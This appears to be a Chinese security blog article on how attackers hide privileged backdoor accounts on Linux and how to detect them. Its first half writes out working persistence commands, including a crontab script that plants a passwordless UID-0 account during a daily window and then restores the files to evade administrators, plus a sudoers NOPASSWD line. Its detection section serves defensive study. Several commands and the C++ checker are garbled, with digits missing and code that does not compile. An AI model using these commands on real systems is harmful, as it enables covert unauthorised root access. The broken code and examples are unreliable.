Linux Hackers/Suspicious Account Detection

时间:2022-12-24 16:08:53

catalog

. Linux黑客帐号攻击向量
. Linux可疑帐号检测模型

1. Linux黑客帐号攻击向量

0x1: 将黑客帐号添加到"root"组

. useradd hacker -p hacker123
. usermod -a -G root hacker
. id hacker

aaarticlea/png;base64,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" alt="" />

0x2: 不使用系统指令添加系统帐号

. vim /etc/passwd
新增一行: musicyxy:x::::/:/bin/bash . vim /etc/shadow
新增一行: musicyxy::::::::
//!wq

0x3: 基于crontab进行帐号隐藏

. 利用crontab(计划任务)进行黑客帐号的隐藏
. 把用于隐藏黑客帐号的伪造passwd和shadow文件备份到别的地方(例如/tmp/passwd、/tmp/shadow),原目录(/etc/passwd、/etc/shadow)保持不变
. 将musicyxy:x::::/:/bin/sh和musicyxy::::::::两条信息追加到伪造的passwd和shadow文件中
. 然后在每天的固定时间点将伪造的passwd、shadow文件替换到/etc/目录,并做好原始正常文件的备份,在过了这段时间窗口后,将原始正常文件还原回来
. 这样我们就可以在伪造文件生效的时间段内登陆系统,在不登陆的时候,伪造文件也会自动还原为正常文件,这样不容易被管理员发现

shell

#!/bin/bash
//每天的11点40分运行cat /etc/passwd > /dev/ttypwd
echo '40 11 * * * cat /etc/passwd > /dev/ttypwd' >> /etc/door.cron;
echo '40 11 * * * cat /etc/shadow > /dev/ttysdw' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow' >> /etc/door.cron;
//每天的12点9分回滚原始正常passwd、shadow文件
echo '09 12 * * * cat /dev/ttypwd > /etc/passwd' >> /etc/door.cron;
echo '09 12 * * * cat /dev/ttysdw > /etc/shadow' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttypwd' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttysdw' >> /etc/door.cron;
service crond restart;
crontab /etc/door.cron;

这样,每天的后门帐号存活时间窗口为11:40~12:09

0x4: 添加UID=0的非root帐号

. 添加普通用户: useradd hacker -p hacker123
//新创建的用户会在/home下创建一个用户目录hacker . 删除用户testuser所在目录
rm -rf /home/hacker . 添加权限
vim /etc/passwd
把新加的用户uid和gid改为0:
hacker:x::::/home/hacker:/bin/bash -> hacker:x::::/home/hacker:/bin/bash
or
useradd -u -o -g root -G root -d /home/hacker hacker

0x5: 基于sudo指令隐藏高权限账户

不管sudoers文件在哪儿,sudo都提供了一个编辑该文件的命令: visudo来对该文件进行修改,它会帮你校验文件配置是否正确,如果不正确,在保存退出时就会提示你哪段配置出错的

<user list> <host list> = <operator list> <tag list> <command list>
//hacker ALL=(ALL) NOPASSWD: ALL
. user list: 用户/组,或者已经设置的用户的别名列表, 用户名直接username,用户组加上%,比如%admin
. host list: 主机名或别名列表
. operator list: runas用户,即可以以哪个用户、组的权限来执行
. tag list: 这个经常用到的是 NOPASSWD: 添加这个参数之后可以不用输入密码
. command list: 可以执行的命令或列表

黑客攻击手段

. vim /etc/sudoers
. 添加一行: hacker ALL=(ALL) NOPASSWD: ALL
. sudo -u root /mnt/sudodir/cmd,不需要输入密码
. 这样就能实现hacker用户允许转换成任意用户及执行任意命令

Relevant Link:

http://read.newbooks.com.cn/info/156976.html
http://network810.blog.51cto.com/2212549/1133349
http://jingyan.baidu.com/article/5bbb5a1b5cf43513eba179b5.html
http://www.linux521.com/2009/system/201005/11198.html
http://www.linux521.com/2009/system/201005/11198.html
https://linux.cn/article-2655-1.html
http://chenall.net/post/linux-sudo-config/

2. Linux可疑帐号检测模型

0x1: 检测root用户组的非root用户

. 通过Bash指令: cut -d: -f1 /etc/passwd,获取当前账户列表
. 遍历列表,调用getpwnam、getgrgid获取每个账户的pw_name、pw_uid、pw_gid
. 检测是否存在异常帐号
) 非root账户,但是uid为0
) 非root账户,但是gid为0
) 非root账户,但是shell为/bin/bash、/bin/sh(非/sbin/nologin)

Code Example

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <grp.h>
#include <pwd.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h> void getUserInfo(const char *name)
{
struct passwd* pw;
struct group* grp; if(name == NULL)
{
return;
} pw = (struct passwd*)malloc(sizeof(struct passwd));
grp = (struct group*)malloc(sizeof(struct group)); pw = getpwnam(name);
if (!pw)
{
printf ("Couldn't find out about user %s, %d.\n", name, errno);
return;
}
printf ("User login name is %s.\n", pw->pw_name);
printf ("User uid is %d.\n", (int) (pw->pw_uid));
printf ("User gid is %d.\n", (int) (pw->pw_gid));
printf ("User home is directory is %s.\n", pw->pw_dir);
printf ("User default shell is %s.\n", pw->pw_shell); //group info
grp = getgrgid (pw->pw_gid);
if(!grp)
{
printf ("Couldn't find out about group %d.\n", (int)pw->pw_gid);
return;
}
printf ("User default group is %s (%d).\n", grp->gr_name, (int) (pw->pw_gid)); return;
} int main()
{
FILE *fp = popen("cut -d: -f1 /etc/passwd", "r");
if(fp == NULL)
{
return ;
}
char line[];
while(fgets(line, , fp) != NULL)
{
//std::cout << line;
getUserInfo((const char *)line);
}
pclose(fp); return ;
} //g++ healthchcker.cpp -o healthchcker

Relevant Link:

http://blog.csdn.net/xocoder/article/details/8987135
http://pubs.opengroup.org/onlinepubs/009695399/basedefs/pwd.h.html
https://www.mkssoftware.com/docs/man5/struct_group.5.asp
http://www.embedu.org/column/Column185.htm
http://www.cnblogs.com/hnrainll/archive/2011/05/07/2039692.html

0x2: /etc/sudoers异常配置检测

. 打开/etc/sudoers
. 递归的处理include的情况
. 检查是否存在除了"root ALL=(ALL) ALL"之外的可疑配置

0x3: /etc/passwd、/etc/shadow权限检查

标准基线权限

. /etc/shadow: other组不应该有写权限
. /etc/shadow: other组不应该有写权限

Copyright (c) 2015 LittleHann All rights reserved